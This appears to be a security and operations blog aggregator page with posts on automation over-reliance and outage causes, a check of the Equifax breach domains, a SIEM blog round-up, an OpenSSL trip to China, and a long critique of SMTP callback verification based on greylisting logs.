“We appear to be locked into a cycle in which automation begets the erosion of skills or the lack of skills in the first place and this then begets more automation.” – William Langewiesche

Four years later Asiana Airlines flight 214 crashed on final approach into SFO, coming in short of the runway and striking the seawall. The NTSB report shows the flight crew mismanaged the initial approach and the aircraft was above the desired glide path. The captain responded by selecting the wrong autopilot mode, which caused the auto throttle to disengage. He had a faulty mental model of the aircraft’s automation logic. This over-reliance on automation and lack of understanding of the systems were cited as major factors leading to the accident.

This has been described as “Children of the Magenta,” because the information presented in the cockpit by the autopilot is magenta in color. The term was coined by Capt. Warren “Van” Vanderburgh at the American Airlines Flight Academy. There are different levels of automation in an aircraft, and he argues that by reducing the level of automation you can reduce the workload in some situations; the amount of automation should match the current conditions of the environment. It’s a 25-minute video that’s worth watching, but it boils down to this: pilots have become too dependent on automation in general and are losing the skills needed to safely control their aircraft.

This led a Federal Aviation Administration task force on cockpit technology to urge airlines to have their pilots spend more time flying by hand. This focus of returning to the basic skills needed is similar to the report released from the Government Accountability Office (GAO) regarding the impact of maintenance and training on the readiness of the US Navy.

Based on updated data, GAO found that, as of June 2017, 37 percent of the warfare certifications for cruiser and destroyer crews based in Japan—including certifications for seamanship—had expired. This represents more than a fivefold increase in the percentage of expired warfare certifications for these ships since GAO’s May 2015 report.

What if Automation is part of the Product?

Knight Capital was a global financial services firm engaged in market making. They used high-frequency trading algorithms to manage a little over 17% of the market share on the NYSE and almost 17% on NASDAQ. In 2012 the NYSE was about to release a new program called the Retail Liquidity Program (RLP). Knight Capital made a number of changes to its systems and software to handle the change, including adding new code to an automated, high-speed, algorithmic router called SMARS that would send orders into the market.

This was intended to replace some deprecated code in SMARS called Power Peg. Except it wasn’t deprecated, and it was still being used. The new code for RLP even reused the same feature flag as Power Peg. During the deploy one server was skipped, and no one noticed the deployment was incomplete. When the feature flag for SMARS was activated, it triggered the Power Peg code on the one server that was missing the update. After 45 minutes of routing millions of orders into the market (4 million executions on 154 stocks), Knight Capital had lost around $460 million. In this case automation could have helped.
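The missing safety check here is easy to sketch. Everything below is hypothetical (the host names, version strings, and the idea of hosts reporting a build version are mine, not Knight Capital’s); it only illustrates verifying that a rollout is complete before flipping a feature flag.

```python
# Sketch of a pre-flag deploy gate, under hypothetical names: refuse to
# enable a feature flag unless every host in the fleet reports the same
# deployed build. This illustrates the missing verification step only.

def safe_to_enable_flag(host_versions, expected):
    """Return (ok, stragglers): ok is True only when every host runs `expected`."""
    stragglers = sorted(h for h, v in host_versions.items() if v != expected)
    return (len(stragglers) == 0, stragglers)

# Seven of eight servers got the new code; one still runs the old build.
fleet = {f"smars-{n:02d}": "rlp-2012-07-31" for n in range(1, 8)}
fleet["smars-08"] = "powerpeg-legacy"

ok, stragglers = safe_to_enable_flag(fleet, "rlp-2012-07-31")
if not ok:
    print("refusing to enable flag; out-of-date hosts:", stragglers)
```

A check like this, run automatically as a deploy gate, is the kind of automation that reduces risk instead of hiding it.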

Automation is not a bad thing. You need to be thoughtful and clear on how it’s being used and how it functions. In Ten Challenges for Making Automation a “Team Player” in Joint Human-Agent Activity the authors provide a guideline for this. They show the interaction between people and automation can be improved by meeting four basic requirements (here I’m thinking that robots only had three laws). They then go on to describe the ten biggest challenges to satisfy them.

Four Basic Requirements

  1. Enter into an agreement, which we’ll call a Basic Compact, that the participants intend to work together
  2. Be mutually predictable in their actions
  3. Be mutually directable
  4. Maintain common ground

Complexity and Chaos

Complexity has a tendency to bring about chaos. It comes from the difficulty people have understanding the system(s), from incomplete visibility into what is happening, and from the sheer number of possibilities within them, covering normal events, the mutability of the data, and the out of the ordinary. That last encompasses failures, people using the system(s) in unexpected ways, large spikes in requests, and bad actors.

If this is the environment we find ourselves working in, we can only control the things we bring into it. That includes making sure we have a grasp on the basics of our profession and maintaining the best possible understanding of what’s happening with our systems. This should allow us to work around issues as they happen and decrease our dependence on our tools. There’s usually more than one way to get information or make a change. Knowing the basics and staying aware of what is happening can get us through the chaos.

There are three people whose works can help navigate these kinds of conditions: John Boyd, Richard I. Cook, and Edward Tufte. Boyd gives us a reference for how to work within chaos and how to use it to our own advantage. Cook shows how complexity can fail and suggests ways to find the causes of those failures. And Tufte explains how we can reduce the complexity of the information we’re working with.

Team Resource Management

This leads us to a proven approach that has been used in aviation, fire fighting, and emergency medicine that we can adapt for our own use. In 1973 NASA started research into human factors in aviation safety. Several years later two Boeing 747s collided on the runway and killed 583 people. This prompted a workshop titled “Resource Management on the Flight Deck” that included the NASA researchers and the senior officers responsible for aircrew training from the major airlines. The result of this workshop was a focus on training to reduce the primary causes of aviation accidents called Crew Resource Management (CRM).

They saw the primary causes as human error and communication problems. The training would reinforce the importance of communication and of orienting to what is actually happening. It changes the cultural muscle memory so that when we start to see things go bad, we speak up and examine it. And it stresses a culture where authority may be questioned.

We’ve already adapted the Incident Command System for our own use… why not do the same with CRM?

What’s the Trend of Causes for Failures?

We don’t have a group like the NTSB or NASA focused on reducing failures in what we do. Yes, there are groups like USENIX, Apache Software Foundation, Linux Foundation, and the Cloud Native Computing Foundation. But I’m not aware of any of them tracking and researching the common causes of failures.

After a few searches for any reference to a postmortem, retro, or outage I came up with this list, pulled from searches on Lobsters, Hacker News, Slashdot, TechCrunch, Techmeme, High Scalability, and ArsTechnica. In this very small, nonscientific sample almost half are due to what I would call human error. There are also four power-related causes. Don’t take anything from this list other than the following: we would benefit from having more transparency into the failures in our industry and a better understanding of their causes.

Date Description and Link Cause
9/7/2017 Softlayer GLBS Outage Unclear
8/26/2017 BGP Leak caused internet outage in Japan Unknown
8/21/2017 Honeycomb outage In Progress
8/4/2017 Visual Studio Team Services outage Human Error
8/2/2017 Issues with Visual Studio Team Services Failed Dependency
5/18/2017 Let’s Encrypt OCSP outage Human Error
3/16/2017 Square Deploy Triggered Load
2/28/2017 AWS S3 Outage Human Error
2/9/2017 Instapaper Outage Cause & Recovery Human Error
1/31/2017 Gitlab Outage Human Error
1/22/2017 United Airlines grounded two hours, computer outage Unknown
10/21/2016 Dyn DNS DDoS DDoS
10/18/2016 Google Compute Engine Human Error
5/10/2016 SalesForce Failure after mitigating a power outage
1/28/2016 Github Service outage Cascading failure after power outage
1/19/2016 Twitter Human Error
7/27/2015 Joyent Manta Outage Locks Blocks The Data
1/10/2014 Dropbox Outage post-mortem Human Error
1/8/2014 GitHub Outage Human Error
3/3/2013 Cloudflare outage Unintended Consequences
8/1/2012 Knight Capital Human Error
6/30/2012 AWS power failure Double Failure of Generators during Power Outage
10/11/2011 Blackberry World Wide 3 Day Outage Hardware Failure and Failed Backup Process
11/15/2010 GitHub Outage Config Error Human Error

“For a successful technology, reality must take precedence over public relations, for nature cannot be fooled.” – R. P. Feynman Rogers Commission Report

September 08, 2017 05:10 PM

September 07, 2017

Michael Biven

Valid Security Announcements

A checklist item for the next time you need to create a landing page for a security announcement.

Make sure the certificate and the whois on the domain being used actually references the name of your company.

My wife sends me a link to this.

I then find the page for the actual announcement from Equifax.

Go to the dedicated website www.equifaxsecurity2017.com and find it’s using a Cloudflare SSL certificate.

The certificate chain doesn’t mention Equifax other than the DNS names used in the cert (*.equifaxsecurity2017.com and equifaxsecurity2017.com).

What happens if I do a whois?

$ whois equifaxsecurity2017.com
   Domain Name: EQUIFAXSECURITY2017.COM
   Registry Domain ID: 2156034374_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.markmonitor.com
   Registrar URL: http://www.markmonitor.com
   Updated Date: 2017-08-25T15:08:31Z
   Creation Date: 2017-08-22T22:07:28Z
   Registry Expiry Date: 2019-08-22T22:07:28Z
   Registrar: MarkMonitor Inc.
   Registrar IANA ID: 292
   Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
   Registrar Abuse Contact Phone: +1.2083895740
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: BART.NS.CLOUDFLARE.COM
   Name Server: ETTA.NS.CLOUDFLARE.COM
   DNSSEC: unsigned

Now I want to see if I’m impacted. Click on the “Check Potential Impact” and I’m taken to a new site (trustedidpremier.com/eligibility/eligibility.html).

And we get another certificate and a whois lacking any reference back to Equifax.

$ whois trustedidpremier.com
   Domain Name: TRUSTEDIDPREMIER.COM
   Registry Domain ID: 2157515886_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.registrar.amazon.com
   Registrar URL: http://registrar.amazon.com
   Updated Date: 2017-08-29T04:59:16Z
   Creation Date: 2017-08-28T17:25:35Z
   Registry Expiry Date: 2018-08-28T17:25:35Z
   Registrar: Amazon Registrar, Inc.
   Registrar IANA ID: 468
   Registrar Abuse Contact Email: registrar-abuse@amazon.com
   Registrar Abuse Contact Phone: +1.2062661000
   Domain Status: ok https://icann.org/epp#ok
   Name Server: NS-1426.AWSDNS-50.ORG
   Name Server: NS-1667.AWSDNS-16.CO.UK
   Name Server: NS-402.AWSDNS-50.COM
   Name Server: NS-934.AWSDNS-52.NET
   DNSSEC: unsigned

I’m not suggesting that the site equifaxsecurity2017.com is malicious, but if you’re going to the trouble of setting up a page like this, make sure your certificate and whois actually reference the company making the announcement. If you look at the creation dates for the domains and the Not Valid Before dates on the certs, they had plenty of time to get domains and certificates created that would reference themselves.
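As a sketch of that checklist item: the function below looks for the company’s name in a certificate’s organization fields. The cert dicts mimic the shape Python’s ssl.SSLSocket.getpeercert() returns, but the values here are made up for illustration.

```python
# Hypothetical sketch: does a certificate actually name the company making
# the announcement? The dict mirrors the structure returned by Python's
# ssl.SSLSocket.getpeercert(); these values are invented for illustration.

def cert_mentions_company(cert, company):
    """True if `company` appears in a subject or issuer organizationName."""
    names = []
    for section in ("subject", "issuer"):
        for rdn in cert.get(section, ()):      # each RDN is a tuple of pairs
            for key, value in rdn:
                if key == "organizationName":
                    names.append(value)
    return any(company.lower() in value.lower() for value in names)

# Shaped like the announcement-site certificate described above:
announcement_cert = {
    "subject": ((("commonName", "*.equifaxsecurity2017.com"),),),
    "issuer": ((("organizationName", "CloudFlare, Inc."),),),
}
print(cert_mentions_company(announcement_cert, "Equifax"))  # prints False
```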

September 07, 2017 02:31 PM

September 01, 2017

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – August 2017

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts/topics this
month:
  1. “Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009. Is it relevant now? You be the judge. Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” …
  2. “Simple Log Review Checklist Released!” is often at the top of this list – this aging checklist is still a very useful tool for many people. “On Free Log Management Tools” (also aged a bit by now) is a companion to the checklist (updated version)
  3. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using a now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our 2016 research on developing security monitoring use cases here!
  4. My classic PCI DSS Log Review series is extra popular! The series of 18 posts covers a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (now in its 4th edition!) – note that this series is mentioned in some PCI Council materials.
  5. “SIEM Resourcing or How Much the Friggin’ Thing Would REALLY Cost Me?” is a quick framework for assessing SIEM project (well, program, really) costs at an organization (a lot more details on this here in this paper).
    In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 5X of the traffic of this blog]: 

    Current research on SIEM:
    Miscellaneous fun posts:

    (see all my published Gartner research here)
    Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016.

    Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

    Previous post in this endless series:

    by Anton Chuvakin (anton@chuvakin.org) at September 01, 2017 03:01 PM

    August 28, 2017

    OpenSSL

    OpenSSL Goes to China

    Over the past few years we’ve come to the realisation that there is a surprising (to us) amount of interest in OpenSSL in China. That shouldn’t have been a surprise, as China is a huge, technologically advanced country, but now we know better thanks to correspondence with many new Chinese contacts and the receipt of significant support from multiple Chinese donors (most notably from Smartisan).

    We have accepted an invitation from BaishanCloud to visit China in person and meet with interested OpenSSL users and stakeholders in September. We’d like to thank BaishanCloud for hosting us and Paul Yang and his colleagues there for the substantial amount of work that went into arranging this trip.

    Five of us (Matt Caswell, Tim Hudson, Richard Levitte, Steve Marquess and Rich Salz) will be in China from 18 September through 24 September, visiting Shanghai, Shenzhen, and Beijing. With this trip we hope to learn more about this significant portion of the open source and OpenSSL user communities, and to make OpenSSL more visible and accessible to that audience. Note that while not quite constituting an OpenSSL team meeting, this will be only the third time any significant number of the OpenSSL team have met in person.

    We will be presenting on various aspects of OpenSSL on 23 September 2017 in Beijing. An introduction to the event and a registration link are available in Chinese.

    We will also be visiting Shanghai and Shenzhen earlier that week to meet with members of the open source community and OpenSSL users and stakeholders. If you can’t make it to the presentation above it may be possible to arrange to meet up with you in one of the above locations. Please drop us a line if you are interested in meeting with us.

    August 28, 2017 01:00 PM

    August 27, 2017

    That grumpy BSD guy

    Twenty-plus years on, SMTP callbacks are still pointless and need to die

    A rarely used legacy misfeature of the main Internet email protocol creeps back from irrelevance as a minor annoyance. You should ask your mail and antispam provider about their approach to 'SMTP callbacks'. Be wary of any assertion that is not backed by evidence.

    Even if you are an IT professional and run an email system, you could be forgiven for not being immediately aware that there is such a thing as SMTP callbacks, also referred to as callback verification. As you will see from the Wikipedia article, the feature was never widely adopted, and for all too understandable reasons.

    If you do run a mail system, you have probably heard about that feature's predecessor, the still-required but rarely used SMTP VRFY and EXPN commands. Those commands offer a way to verify whether an address is valid and to show the component addresses that a mailing list resolves to, respectively.

    Back when all things inter-networking were considered experimental and it was generally thought that information should flow freely in and between those experimental networks, it was quite common for mail servers to offer VRFY and EXPN service to all comers.

    I'm old enough to remember using VRFY by hand, telnet-ing to port 25 on a mail server and running VRFY $user@$domain.$tld commands to check whether an email address was indeed valid. I've forgotten which domains and persons were involved, but I imagine the reason why was that I wanted to contact somebody who had said something interesting in a post to a USENET news group.

    But networkers trying to make contact with each other were not the only ones who discovered the VRFY and EXPN commands.  Soon spammers were using those commands to actively harvest actually! valid! deliverable! addresses, and by 1999 the RFC2505 best practices document recommended disabling the features altogether. After all, there would usually be some other way available to find somebody's email address (there was even a FAQ, a longish Frequently Asked Questions document with apparent USENET origins written and maintained on the subject, a copy of which can be found here).

    In roughly the same time frame, somebody came up with the idea of SMTP callbacks. The idea was that all domains on the Internet need to publish the address of their mail exchangers via DNS MX (mail exchanger) records. The logical next step is then that when a piece of mail arrives over SMTP, the receiving end should be able to contact the sender domain's known mail exchanger to check that the sender address is indeed valid. If you by now hear the echoes of VRFY and EXPN, you're right. There are indications that some early implementations did in fact use VRFY for that purpose.

    But then the world changed, and you could not rely on VRFY being available in the post-RFC2505 world.

    In the post-RFC2505 world, the other side would most likely not offer up any useful information in response to VRFY commands, and you would most likely be limited to the short interchange that the Wikipedia entry quotes,
    HELO <verifier host name>
    MAIL FROM:<>
    RCPT TO:<the address to be tested>
    QUIT
    which a perceptive reader would identify as only verifying in a very limited sense that the domain's mail exchanger was indeed equipped with a functional SMTP service.
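The interchange above can be written out as the exact command sequence a callback sender emits. This is only a sketch of the dialog's shape, with a made-up verifier host; it deliberately opens no network connection.

```python
# Build the four-line SMTP callback dialog quoted above as a list of
# commands. Host and address are placeholders; nothing is sent anywhere.

def callback_dialog(verifier_host, address):
    return [
        f"HELO {verifier_host}",
        "MAIL FROM:<>",              # null reverse-path, as callbacks use
        f"RCPT TO:<{address}>",      # the address being "verified"
        "QUIT",
    ]

for line in callback_dialog("mx.example.net", "someone@bsdly.com"):
    print(line)
```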

    It is worth noting, as many have over the years, that the MX records only specify where a domain expects to receive mail, not where valid mail from the domain is supposed to originate. Several mechanisms to help identify valid mail senders for a domain have been devised in the intervening years, but none existed at the time SMTP callbacks were considered even remotely useful. 

    For reasons that are not entirely clear, some developers kept working on SMTP callback code and several mail server implementations available today (2017) still contain code that looks like it was intended to support information-rich callbacks, if the system was configured to enable the feature at all. The default configurations in general do not enable the SMTP callback feature, and mail admins rarely bother to even learn much about the largely disused and (in my opinion at least) not too well thought out feature.

    This all happened back in the 1990s, but quite recently an incident occurred which indicates that in some pockets of the Internet, SMTP callbacks are still in use, and that in at least some cases data from the callbacks are used to generate blacklists and block mail delivery. The last part should raise a few eyebrows at least.

    Jumping forward from the distant 1990s to the present day, regular readers of this column will be aware that bsdly.net and cooperating domains run SMTP service with OpenBSD spamd(8) doing greylisting service, and that the spamd(8) setup produces a greytrapping-based blacklist which is available for download, dumped to a file (available here and here) once per hour.

    Maintaining the mail system and the blacklist also involves keeping an eye on mail-related activities, and invalid addresses in our domains that turn up in the greylist are usually added to the list of spamtrap addresses within not too many hours after they first appear. The process of actually adding spamtrap addresses is a manual one, but based on the output of pathetically simple shell scripts that run as cron jobs.
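The post doesn't show those scripts, so the following is only a guess at their job, rewritten in Python with illustrative domains and addresses: flag greylisted To: addresses in our own domains whose local parts aren't already known spamtraps.

```python
# Hypothetical reconstruction of the cron job's task: report addresses in
# our domains that show up in the greylist but aren't yet on the spamtrap
# list. The trap list and domains below are illustrative, not the real data.

KNOWN_TRAPS = {"keerheior@bsdly.com"}
OUR_DOMAINS = {"bsdly.com", "bsdly.net"}

def new_trap_candidates(greylist_addresses):
    candidates = set()
    for addr in greylist_addresses:
        local, _, domain = addr.rpartition("@")
        if domain in OUR_DOMAINS and addr not in KNOWN_TRAPS:
            candidates.add(addr)
    return sorted(candidates)

seen = ["keerheior@bsdly.com", "anecowuutp@bsdly.com", "user@example.org"]
print(new_trap_candidates(seen))  # only the unfamiliar bsdly.com address
```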

    The list of spamtraps has grown over the years to more than 38 000 entries. Most of the entries have local parts that are pure generated gibberish, some entries are probably degraded versions of earlier spamtrap addresses and some again seem to conform with specific patterns, including but not limited to SMTP or NNTP message IDs.

    On August 19th and 20th 2017 I noticed a different, but yet familiar pattern in some of the new entries.

    The entry that caught my eye had the MAIL FROM: part as

    mx42.antispamcloud.com-1503146097-testing@bsdly.com

    The local part pattern was somewhat familiar, and breaks down to

        $localhostname-$epochtime-testing

    with @targetdomain.$tld (in our case, bsdly.com) appended. I had at this point totally forgotten about SMTP callbacks, but I decided to check the logs for any traces of activity involving that host. The only trace I could find in the logs was at the spamd-serving firewall in front of the bsdly.com domain's secondary mail exchanger:

    Aug 19 14:35:27 delilah spamd[26915]: 207.244.64.181: connected (25/24)
    Aug 19 14:35:38 delilah spamd[26915]: (GREY) 207.244.64.181: <> -> <mx42.antispamcloud.com-1503146097-testing@bsdly.com>
    Aug 19 14:35:38 delilah spamd[15291]: new entry 207.244.64.181 from <> to <mx42.antispamcloud.com-1503146097-testing@bsdly.com>, helo mx18-12.smtp.antispamcloud.com
    Aug 19 14:35:38 delilah spamd[26915]: 207.244.64.181: disconnected after 11 seconds.

    Essentially a normal first contact: spamd at our end answers slowly, one byte per second, but the greylist entry is created in the expectation that any caller with a valid message to deliver will try again within a reasonable time. The spamd synchronization between the hosts in our group of greylisting hosts would see to it that an entry matching this sequence appeared in the greylist on all participating hosts.
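The behavior described here can be reduced to a toy model. It assumes spamd-like defaults (a first attempt for a source/from/to tuple is recorded and temporarily refused; a retry passes only after the passtime has elapsed); this illustrates greylisting logic, not spamd's actual implementation.

```python
# Greylisting in miniature. Times are seconds; 25 minutes mirrors spamd's
# default passtime. A real implementation also expires stale entries.

PASSTIME = 25 * 60

class Greylist:
    def __init__(self):
        self.first_seen = {}

    def attempt(self, ip, mail_from, rcpt_to, now):
        key = (ip, mail_from, rcpt_to)
        if key not in self.first_seen:
            self.first_seen[key] = now
            return "greylisted"       # new entry, caller should retry later
        if now - self.first_seen[key] >= PASSTIME:
            return "whitelisted"      # patient retry, let it through
        return "greylisted"           # retried too soon

g = Greylist()
print(g.attempt("207.244.64.181", "<>", "test@bsdly.com", 0))     # greylisted
print(g.attempt("207.244.64.181", "<>", "test@bsdly.com", 1800))  # whitelisted
```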

    But the retry never happened, and even if it had, that particular local-part would anyway have produced an "Unknown user" bounce. But at that point I decided to do a bit of investigation and dug out what seemed to be a reasonable point of contact for the antispamcloud.com domain and sent an email with a question about the activity.

    That message bounced, with the following explanation in the bounce message body:

      DOMAINS@ANTISPAMCLOUD.COM
        host filter10.antispamcloud.com [31.204.155.103]
        SMTP error from remote mail server after end of data:
        550 The sending IP (213.187.179.198) is listed on https://spamrl.com as a source of dictionary attacks.

    As you have probably guessed, 213.187.179.198 is the IPv4 address of the primary mail exchanger for bsdly.net, bsdly.com and a few other domains under my care.

    If you go to the URL quoted in the bounce, you will notice that the only point of contact is via an email address in an unrelated domain.

    I did fire off a message to that address from an alternate site, but before the answer to that one arrived, I had managed to contact another of their customers and got confirmation that they were indeed running with an exim setup that used SMTP callbacks.

    The spamrl.com web site states clearly that they will not supply any evidence in support of their decision to blacklist. Somebody claiming to represent spamrl.com did respond to my message, but as could be expected from their published policy was not willing to supply any evidence to support the claim stated in the bounce.

    In my last message to spamrl.com before starting to write this piece, I advised

    I remain unconvinced that the description of that problem is accurate, but investigation at this end can not proceed without at least some supporting evidence such as times of incidents, addresses or even networks affected.
    If there is a problem at this end, it will be fixed. But that will not happen as a result of handwaving and insults. Actual evidence to support further investigation is needed.
    Until verifiable evidence of some sort materializes, I will assume that your end is misinterpreting normal greylisting behavior or acting on unfounded or low-quality reports from less than competent sources.

    The domain bsdly.com was one I registered some years back mainly to fend off somebody who offered to help the owner of the bsdly.net domain acquire the very similar bsdly.com domain at the price of a mere few hundred dollars.

    My response was to spend something like ten dollars (or was it twenty?) to register the domain via my regular registrar. I may even have sent back a reply about trying to sell me what I already owned, but I have not bothered to dig that far back into my archives.

    The domain does receive mail, but is otherwise not actively used. However, as the list of spamtraps can attest (the full list does not display in a regular browser, since some of the traps are interpreted as html tags, if you want to see it all, fetch the text file instead), others have at times tried to pass off something or other with from addresses in that domain.

    But with the knowledge that this outfit's customers are believers in SMTP callbacks as a way to identify spam, here is my hypothesis on what actually happened:

    On August 19th 2017, my greylist scanner identified the following new entries referencing the bsdly.com domain:
    anecowuutp@bsdly.com
    pkgreewaa@bsdly.com
    eemioiyv@bsdly.com
    keerheior@bsdly.com
    mx42.antispamcloud.com-1503146097-testing@bsdly.com
    vbehmonmin@bsdly.com
    euiosvob@bsdly.com
    otjllo@bsdly.com
    akuolsymwt@bsdly.com

    I'll go out on a limb and guess that mx42.antispamcloud.com was contacted by any of the roughly 5000 hosts blacklisted at bsdly.net at the time, with an attempt to deliver a message with a MAIL FROM: of either anecowuutp@bsdly.com, pkgreewaa@bsdly.com, eemioiyv@bsdly.com or perhaps most likely keerheior@bsdly.com, which appears as a bounce-to address in the same hourly greylist dump where mx42.antispamcloud.com-1503146097-testing@bsdly.com first appears as a To: address.

    The first seen time in epoch notation for keerheior@bsdly.com is
    1503143365
    which translates via date -r to
    Sat Aug 19 13:49:25 CEST 2017
    while mx42.antispamcloud.com-1503146097-testing@bsdly.com is first seen here at epoch 1503146138, which translates to Sat Aug 19 14:35:38 CEST 2017.
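Pulling the embedded pieces back out of such a local part, and converting the epoch the same way date -r does above, might look like this (the regex and function name are my own, not from any tool mentioned; CEST is UTC+2):

```python
# Parse a "$localhostname-$epochtime-testing@domain" callback-style address
# and convert the embedded epoch to local (CEST, UTC+2) time.

import re
from datetime import datetime, timezone, timedelta

def parse_callback_trap(address):
    local, _, domain = address.rpartition("@")
    m = re.fullmatch(r"(?P<host>.+)-(?P<epoch>\d{10})-testing", local)
    if not m:
        return None
    return m.group("host"), int(m.group("epoch")), domain

host, epoch, domain = parse_callback_trap(
    "mx42.antispamcloud.com-1503146097-testing@bsdly.com")
cest = timezone(timedelta(hours=2))
print(host, domain, datetime.fromtimestamp(epoch, cest))
```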

    The data indicate that this initial (and only) attempt to contact was aimed at the bsdly.com domain's secondary mail exchanger, and was intercepted by the greylisting spamd that sits in the incoming signal path to there. The other epoch-tagged callbacks follow the same pattern, as can be seen from the data preserved here.

    Whatever action or address triggered the callback, the callback appears to have followed the familiar script:
    1. register attempt to deliver mail
    2. look up the domain stated in the MAIL FROM: or perhaps even the HELO or EHLO
    3. contact the domain's mail exchangers with the rump SMTP dialog quoted earlier
    4. with no confirmation or otherwise of anything other than the fact that the domain's mail exchangers do listen on the expected port, proceed to whatever the next step is.
    The known facts at this point are:
    1. a mail system that is set up for SMTP callbacks received a request to deliver mail from keerheior@bsdly.com
    2. the primary mail exchanger for bsdly.com has the IPv4 address 213.187.179.198
    The second of these we know for sure, and the first is quite likely. What is missing here is any consideration of where the request to deliver came from.

    From the data we have here, we do not have any indication of what host contacted the system that initiated the callback. In a modern configuration, it is reasonable to expect that a receiving system checks for sender validity via any SPF, DKIM or DMARC records available, or for that matter, greylist and wait for the next attempt (in fact, greylisting before performing any other checks - as an OpenBSD spamd(8) setup would do by default - is likely to be the least resource intensive approach).

    We have no indication that the system performing the SMTP callout used any such mechanism to find an indication as to whether the communication partner was in fact in any way connected to the domain it was trying to deliver mail for.

    My hypothesis is that whatever code is running on the SMTP callback adherents' systems does not check the actual sending IP address, but assumes that any message claiming to be from a domain must in fact involve the primary mail exchanger of that domain and since the code likely predates the SPF, DKIM and DMARC specifications by at least a decade, it will not even try to check those types of information. Given the context it is a little odd but perhaps within reason that in all cases we see here, the callback is attempted not to the domain's primary mail exchanger, but the secondary. 

    With somebody or perhaps even several somebodies generating nonsense addresses in the bsdly.com domain at an appreciable rate (see the record of new spamtraps starting May 20th, 2017, alternate location here) and trying to deliver using those fake From: addresses to somewhere doing SMTP callback, it's not much of a stretch to assume that the code was naive enough to conclude that the purported sender domain's primary mail exchanger was indeed performing a dictionary attack.

    The most useful lesson to take home from this sorry affair is likely to be that you need to kill SMTP callback setups in any system where you may find them. In today's environment, SMTP callbacks do not in fact provide useful information that is not available from other public sources, and naive use of results from those lookups is likely to harm unsuspecting third parties.

    So,
    • If you are involved in selling or operating a system that behaves like the one described here and are in fact generating blacklists based on those very naive assumptions, you need to stop doing so right away.

      Your mistaken assumptions help produce bad data, which could lead to hard-to-debug problems for innocent third parties.

      Or as we say in the trade, you are part of the problem.
    • If you are operating a system that does SMTP callbacks but doesn't do much else, you are part of a small problem and likely only inconveniencing yourself and your users.

      The fossil record (aka the accumulated collection of spamtraps at bsdly.net) indicates that the callback variant that includes epoch times is rare enough (approximately 100 unique hosts registered over a decade) that callback activity in total volume probably does not rise above the level of random background noise.

      There may of course be callback variants that have other characteristics, and if you see a way to identify those from the data we have, I would very much like to hear from you.
    • If you are a customer of somebody selling antispam products, you have reason to demand an answer to just how, if at all, your antispam supplier utilizes SMTP callbacks. If they think it's a fine and current feature, you have probably been buying snake oil for years.
    • If you are the developer or maintainer of mail server code that contains the SMTP callbacks feature, please remove the code. Leaving it disabled by default is not sufficient. Removing the code is the only way to make sure the misfeature will never again be a source of confusing problems.
    For some hints on what I consider a reasonable and necessary level of transparency in blacklist maintenance, please see my April 2013 piece Maintaining A Publicly Available Blacklist - Mechanisms And Principles.

    The data this article is based on still exists and will be available for further study to requestors with reasonable justification for their request. I welcome comments in the comment field or via email (do factor in any possible greylist delay, though).

    Any corrections or updates that I find necessary based on your responses will be appended to the article.



    Update 2017-09-05: Since the article was originally published, we've seen a handful of further SMTP callback incidents. The last few we've handled by sending the following to the addresses that could be gleaned from whois on the domain name and source IP address (with mx.nxdomain.nx and 192.0.2.74 inserted as placeholders here to protect the ignorant):

    Hi,

    I see from my greylist dumps that the host identifying as 

    mx.nxdomain.nx, IP address 192.0.2.74

    is performing what looks like SMTP callbacks, with the (non-existent of course) address

    mx.nxdomain.nx-1504629949-testing@bsdly.com

    as the RCPT TO: address.

    It is likely that this activity has been triggered by spam campaigns using made up addresses in one of our little-used domains as from: addresses.

    A series of recent incidents here following the same pattern are summarized in the article

    http://bsdly.blogspot.com/2017/08/twenty-plus-years-on-smtp-callbacks-are.html

    Briefly, the callbacks do not work as you expect. Please read the article and then disable that misfeature. Otherwise you will be complicit in generating false positives for your SMTP blacklist.

    If you have any questions or concerns, please let me know.

    Yours sincerely,
    Peter N. M. Hansteen

    If you've received a similarly-worded notice recently, you know why and may be closer to having a sanely run mail service.
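For anyone who wants to scan their own greylist dumps for this pattern, the probe addresses are easy to pick out mechanically. The sketch below assumes the `<host>-<epoch>-testing@<domain>` shape seen in the samples quoted above; the function name and the epoch sanity threshold are my own assumptions, not part of any observed implementation.

```c
#include <stdlib.h>
#include <string.h>

/* Extracts the epoch from callback probe addresses shaped like
 * "mx.nxdomain.nx-1504629949-testing@bsdly.com"; returns -1 when the
 * address does not match.  The shape is taken from observed samples;
 * the parsing approach and the sanity threshold are assumptions. */
long callback_epoch(const char *rcpt)
{
    const char *at = strchr(rcpt, '@');
    if (!at || (size_t)(at - rcpt) <= strlen("-testing"))
        return -1;
    const char *tag = at - strlen("-testing");
    if (strncmp(tag, "-testing", strlen("-testing")) != 0)
        return -1;
    /* walk back from the tag to the '-' that starts the epoch field */
    const char *dash = tag - 1;
    while (dash > rcpt && *dash != '-')
        dash--;
    if (*dash != '-')
        return -1;
    char *end;
    long epoch = strtol(dash + 1, &end, 10);
    if (end != tag || epoch < 1000000000)  /* reject pre-2001 values */
        return -1;
    return epoch;
}
```

Running something like this over RCPT TO: addresses in a greylist dump separates the epoch-bearing callback probes from ordinary spamtrap hits.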


    by Peter N. M. Hansteen (noreply@blogger.com) at August 27, 2017 12:44 PM

    August 22, 2017

    Michael Biven

    How I Minimize Distractions

